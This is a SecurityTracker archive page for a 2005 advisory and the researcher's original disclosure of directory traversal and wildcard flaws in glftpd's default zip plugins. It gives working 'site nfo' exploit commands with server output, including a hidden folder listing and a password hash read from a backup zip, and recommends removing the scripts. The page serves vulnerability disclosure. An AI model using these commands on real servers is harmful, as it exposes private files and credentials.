SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   glFtpD Vendors:   glftpd.org
glftpd Plugins Disclose Files to Remote Authenticated Users
SecurityTracker Alert ID:  1013242
SecurityTracker URL:  http://securitytracker.com/id/1013242
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 19 2005
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 1.26 - 2.00
Description:   A vulnerability was reported in glftpd in the plugins. A remote authenticated user can view certain files on the system.

The 'sitenfo.sh' script does not properly validate user-supplied input. A remote authenticated user can access files on the target system.

A remote authenticated user can determine if files exist on the target system with the following type of command:

ftp> site nfo ../etc/group

A remote authenticated user can view directory listings for directories outside of the FTP directory with the following type of command:

ftp> site nfo ../../../../../etc/*

A remote authenticated user can view files within arbitrary zip files on the target system. A demonstration exploit command is provided:

ftp> site nfo ../../backup.zip p*

sitezipchk.sh and siteziplist.sh are also affected.

Paul Craig from Pimp Industries reported this vulnerability.

Impact:   A remote authenticated user can view certain files on the system.
Solution:   No solution was available at the time of this entry.

As a workaround, the report indicates that you can remove sitenfo.sh, siteziplist.sh, and sitezipchk.sh from the /bin directory.

Vendor URL:  www.glftpd.com/ (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  Multiple vulnerabilities in Glftpd v1.26 - v2.00 default zip based


                     Pimp industries.
      "Its all about the Bling, B^!%@s and Fame!"

Multiple vulnerabilities in Glftpd v1.26 - v2.00 default zip based plug-ins
: sitenfo.sh, sitezipchk.sh, siteziplist.sh

      (C) Paul Craig - Pimp Industries 2005


Background
-------------
glftpd is an open source ftp server used by the more 'hardcore' of ftp
servers :) (www.glftpd.com)


Exploit:
-------------
The exploit is not in glftpd itself, instead inside a suite of zip based
plug-ins that come with the glftpd package by default, these plug-ins are
widely used in installations of glftpd.
This advisory will focus on the plugin sitenfo.sh, a script to allow users
to read .nfo and .diz files from within zip archives("SITE NFO" by
default). Although the exploits are synonymous with all the .sh scripts
listed above.

Due to improper input validation several flaws exist in the script that
can allow for unprivileged access to files within the glftpd chroot and
information disclosure of private files

Firstly.
Directory transversal to prove the existence of a valid file outside of
the ftp siteroot:

ftp> site nfo ../etc/grouap
200- dn's NFO Lister v1.00
200-
200- That zipfile (../etc/grouap)  does not exist!
200 Error executing command.
ftp> site nfo ../etc/group
200- dn's NFO Lister v1.00
200-
200- nfo(s) from ../etc/group:
200-
200 Command Successful.

Here we determine that the file ../etc/group exists, a file outside of the
default FTP site root.

Secondly.
Directory transversal globbing attack:
Due to improper parsing of *, a user can return the first two files in any
directory ($1 $2), including files within 'private' or hidden directory's
such as the 'staff' folder.

ftp> site nfo ../../../../../etc/*
200- dn's NFO Lister v1.00
200-
200- ../../../../../etc/group from ../../../../../etc/ftpd-dsa.pem:

and to view inside private folders within the ftp root (that usually you
are unable to see)

ftp> site nfo staff/*
200- dn's NFO Lister v1.00
200-
200- staff/Mark from staff/Peter:
200- Command Successful.
ftp> cd staff
200- No such file or directory.

Here we can see that staff/Mark and staff/Peter exist, although we are
unable to even see the directory staff/ by default, since we have no
access.

This can be further exploited to build a full directory tree by using
guided wildcards within the globbed request, such as.
site nfo ../../../../../etc/a*
site nfo ../../../../../etc/b*
site nfo ../../../../../etc/c*

And so on and so forth to list all valid files and directories.

Finally you can use the script to also view any file inside any zipfile
within the glftp root, such as backups or zipfiles in private directories.

First, we find a zip file.

ftp> site nfo ../../*.zip
200- dn's NFO Lister v1.00
200-
200- nfo(s) from ../../backup.zip:

backup.zip exists outside the glftpd site root and is returned in $1 to
sitenfo.sh

Now we will read all files within backup.zip that begin wtih 'p'
ftp> site nfo ../../backup.zip p*
200- dn's NFO Lister v1.00
200-
200- passwd from ../../backup.zip:
200-
glftpd:$c8aa2099$89be575337e36892c6d7f4181cad175d685162ad:0:0:0:/site:/bin/false

This will of cause only work for zip compressed files, not gzip files.

Combined, these flaws allow a user to browse the glftp chrooted
environment and then read any file inside any zip file. Considering zip
files may contain sensitive information such as backups or private
documents, this exploit could easily lead to further privilege escalation.

sitezipchk.sh and siteziplist.sh both contain similar exploits, although I
have noticed sitenfo.sh is more frequently used in glftpd sites.

Suggestions/Work Around:
-------------

Easy solution is to remove sitenfo.sh, siteziplist.sh and sitezipchk.sh
from the /bin directory, passing user supplied arguments to shell is never
bright and is not worth the security risk.


Company status
---------------
Pimp Industries is a privately owned New Zealand based security research
company.
If you would like to contact Pimp Industries to discuss any nature of
business, please email us at headpimp at pimp-industries.com.


Personal Pimp Hello's fly to:
-------------------
The boys at security-assessment.com, pinky, sozni, and you! yes, you!

Paul Craig
Head Pimp, Security Researcher
Pimp Industries
"Move fast, think faster"


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC